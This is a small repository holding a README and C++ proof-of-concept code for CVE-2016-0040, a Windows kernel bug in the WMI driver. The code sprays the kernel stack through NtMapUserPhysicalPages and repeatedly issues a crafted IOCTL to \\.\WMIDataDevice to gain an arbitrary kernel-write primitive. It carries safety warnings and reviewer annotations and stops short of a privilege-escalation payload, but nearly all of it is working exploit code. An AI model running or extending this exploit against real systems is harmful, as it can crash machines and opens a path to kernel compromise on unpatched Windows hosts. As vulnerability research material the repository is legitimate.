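├── README.md
└── poc.cc

/README.md:
--------------------------------------------------------------------------------
# cve-2016-0040

PoC for CVE-2016-0040, a bug found and exploited by Meysam Firozi @R00tkitSmm.

This PoC writes caller-controlled data to a caller-chosen address in the Windows kernel
(an arbitrary-write primitive; it does not escalate privileges by itself).

For more info see my blog:
http://ioctl.ir/index.php/2016/02/13/cve-2016-0040-story-of-uninitialized-pointer/

--------------------------------------------------------------------------------
/poc.cc:
--------------------------------------------------------------------------------
// poc.cc -- PoC for CVE-2016-0040.
//
// Drives the IOCTL_WMI_RECEIVE_NOTIFICATIONS path of \\.\WMIDataDevice with a request
// buffer pre-filled with 0x41 while spraying the kernel stack with 0x42, so that a pointer
// the driver leaves uninitialised (per the blog post linked in the README) takes a value
// the caller chose.  Per the README the result on a vulnerable build is a kernel write to
// that address.  This file stops at the write primitive: there is no payload and no
// privilege change here ("exercise for readers" in the original).
//
// Safety: this corrupts or crashes the kernel of the machine it runs on.  Run it only in
// a throw-away VM of a build still vulnerable to CVE-2016-0040.  Nothing below bounds the
// IOCTL loop, so on a build where the IOCTL keeps succeeding it spins until killed.
//
// NOTE(review): the original listing's two #include lines lost their <...> targets in
// extraction.  <windows.h> (HANDLE, CTL_CODE, CreateFileA, DeviceIoControl, ...) and
// <string.h> (memset) are what the code needs; <stdio.h> is new, for the error reports
// added in main().  Confirm against the upstream file.
#include <windows.h>
#include <string.h>
#include <stdio.h>

#ifdef _MSC_VER
// NtMapUserPhysicalPages is an ntdll export; the original listing did not say how it was
// linked.  This keeps an MSVC build self-contained.
#pragma comment(lib, "ntdll.lib")
#endif

// ---------------------------------------------------------------------------------------
// Kernel-facing request layouts.  Field order, widths and padding are the ABI the WMI
// driver parses; do not "tidy" them.  Names follow the original listing.
// ---------------------------------------------------------------------------------------

typedef union {
    HANDLE  Handle;
    ULONG64 Handle64;
    ULONG32 Handle32;
} HANDLE3264, *PHANDLE3264;

typedef struct {
    ULONG      HandleCount;        // number of valid entries in Handles[]; this PoC sends 0
    ULONG      Action;             // RECEIVE_ACTION_* selector
    HANDLE     UserModeCallback;   // PUSER_THREAD_START_ROUTINE in the driver's view;
                                   // deliberately left as the 0x41 fill by main()
    HANDLE3264 UserModeProcess;    // presumably the process the callback thread runs in
    HANDLE3264 Handles[20];        // guid notification handles
} WMIRECEIVENOTIFICATION, *PWMIRECEIVENOTIFICATION;

// Action value that makes the driver take the thread-creation path.  (The trailing
// comment in the original listing is truncated: "Mark guid objects as requiring ...".)
#define RECEIVE_ACTION_CREATE_THREAD 2

// Not referenced by this PoC; kept because it documents the same driver interface.
typedef struct {
    IN  VOID        *ObjectAttributes;
    IN  ACCESS_MASK  DesiredAccess;
    OUT HANDLE3264   Handle;
} WMIOPENGUIDBLOCK, *PWMIOPENGUIDBLOCK;

#define IOCTL_WMI_RECEIVE_NOTIFICATIONS \
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS)

// Device the IOCTL is issued against (string unchanged from the original).
#define WMI_DEVICE_PATH "\\\\.\\WMIDataDevice"

// ntdll export used purely as a kernel-stack spray primitive: the kernel reads
// NumberOfPages entries of UserPfnArray, and the PoC relies on that copy leaving the
// byte pattern on the kernel stack (see the blog post; the mechanism itself is not
// visible in this file).  Its return status is not meaningful to the PoC and is ignored.
//
// Prototype fixes relative to the original listing:
//  - NTAPI instead of STDCALL: STDCALL is not a Windows SDK macro (MinGW supplies it);
//    NTAPI is __stdcall under both toolchains.
//  - NumberOfPages / UserPfnArray are ULONG_PTR-sized, matching the export.  The
//    original's ULONG/PULONG only agree with it on 32-bit builds.
extern "C" LONG NTAPI
NtMapUserPhysicalPages(
    PVOID      VirtualAddress,
    ULONG_PTR  NumberOfPages,
    PULONG_PTR UserPfnArray
);

// Spray the kernel stack with 0x42: fill a pattern array and hand it to
// NtMapUserPhysicalPages as a PFN array of 1024 entries.
//
// The array is declared in ULONG_PTR units on purpose.  The original used a 4096-byte
// BYTE array and passed sizeof(buffer)/sizeof(DWORD) == 1024 as the entry count; on x64
// that asks the kernel to read 1024 * 8 = 8192 bytes from a 4096-byte buffer, i.e. past
// the end of the local array.  With ULONG_PTR elements the 1024 entries are fully backed
// on both architectures, and the x86 layout (4096 bytes, 1024 entries) is unchanged.
VOID SprayKernelStack() {
    ULONG_PTR pattern[1024];
    memset(pattern, 'B', sizeof(pattern));
    // Status intentionally ignored: only the kernel-side copy of the array matters.
    (VOID)NtMapUserPhysicalPages(pattern, sizeof(pattern) / sizeof(pattern[0]), pattern);
}

// Entry point.  Opens the WMI device, then loops: spray the kernel stack, issue the
// notification IOCTL with the prepared request.  Returns 0 only if the loop is left by
// other means (it is not, today); returns 1 and prints GetLastError() when the device
// cannot be opened or the IOCTL fails.  The original returned 0 -- success -- when
// CreateFileA failed, which hid the most common setup error (wrong device / no access).
int main() {
    WMIRECEIVENOTIFICATION request;
    CHAR  output[1000];
    DWORD bytesReturned = 0;

    // Every byte of the request the driver does not explicitly consume is 0x41.  The
    // original comment on this line reads "set ecx to 0x41414141": the fill is what the
    // uninitialised pointer ends up holding on the author's target.
    memset(&request, '\x41', sizeof(request));
    request.HandleCount = 0;
    request.Action = RECEIVE_ACTION_CREATE_THREAD;
    request.UserModeProcess.Handle = GetCurrentProcess();   // pseudo-handle to self
    // request.UserModeCallback: left as the 0x41 fill, as in the original.

    HANDLE device = CreateFileA(WMI_DEVICE_PATH, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                                OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (device == INVALID_HANDLE_VALUE) {
        fprintf(stderr, "CreateFileA(%s) failed: %lu\n", WMI_DEVICE_PATH, GetLastError());
        return 1;
    }

    int rc = 0;
    for (;;) {
        SprayKernelStack();
        if (!DeviceIoControl(device, IOCTL_WMI_RECEIVE_NOTIFICATIONS,
                             &request, sizeof(request),
                             output, sizeof(output), &bytesReturned, NULL)) {
            fprintf(stderr, "DeviceIoControl failed: %lu\n", GetLastError());
            rc = 1;
            break;
        }
    }

    CloseHandle(device);   // the original leaked the device handle on every exit path
    return rc;
}
--------------------------------------------------------------------------------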